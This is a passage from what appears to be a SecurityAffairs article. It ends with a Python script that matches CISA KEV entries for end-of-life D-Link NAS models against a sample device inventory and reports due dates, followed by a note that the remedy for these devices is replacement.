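# advisory lists so inventory rows can be matched.
PRODUCT_MODELS = {
    ("D-Link", "Multiple NAS Devices"): {"DNS-320L", "DNS-325", "DNS-327L", "DNS-340L"},
}

# Constructed inventory: one affected NAS, one D-Link model not in the list,
# one unrelated device.
INVENTORY = [
    {"host": "nas-01", "vendor": "D-Link", "model": "DNS-320L"},
    {"host": "nas-02", "vendor": "D-Link", "model": "DNS-343"},
    {"host": "fw-01", "vendor": "Fortinet", "model": "FortiGate 60F"},
]


def kev_exposure(kev_json, inventory, today=None):
    """Return one row per (host, CVE) match with days until the KEV due date
    and whether it is already overdue.  'today' is an ISO date string; it
    defaults to the current date."""
    ref = date.fromisoformat(today) if today else date.today()
    catalog = json.loads(kev_json)["vulnerabilities"]
    rows = []
    for asset in inventory:
        for entry in catalog:
            models = PRODUCT_MODELS.get((entry["vendorProject"], entry["product"]), set())
            if asset["vendor"] == entry["vendorProject"] and asset["model"] in models:
                due = date.fromisoformat(entry["dueDate"])
                rows.append({
                    "host": asset["host"], "cve": entry["cveID"], "due": entry["dueDate"],
                    "days_left": (due - ref).days, "overdue": ref > due,
                    "action": entry["requiredAction"],
                })
    return rows


if __name__ == "__main__":
    for row in kev_exposure(KEV_SAMPLE, INVENTORY):
        print(row)
```

Against the live feed the only change is fetching the JSON; the product-to-model mapping is the part that needs maintaining, because KEV entries name families and the models come from the vendor advisory. For end-of-life entries like these two the required action is replacement, so the useful output is a list of hosts to decommission, not a patch queue.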


Pierluigi Paganini

(SecurityAffairs – Hacking, CISA)
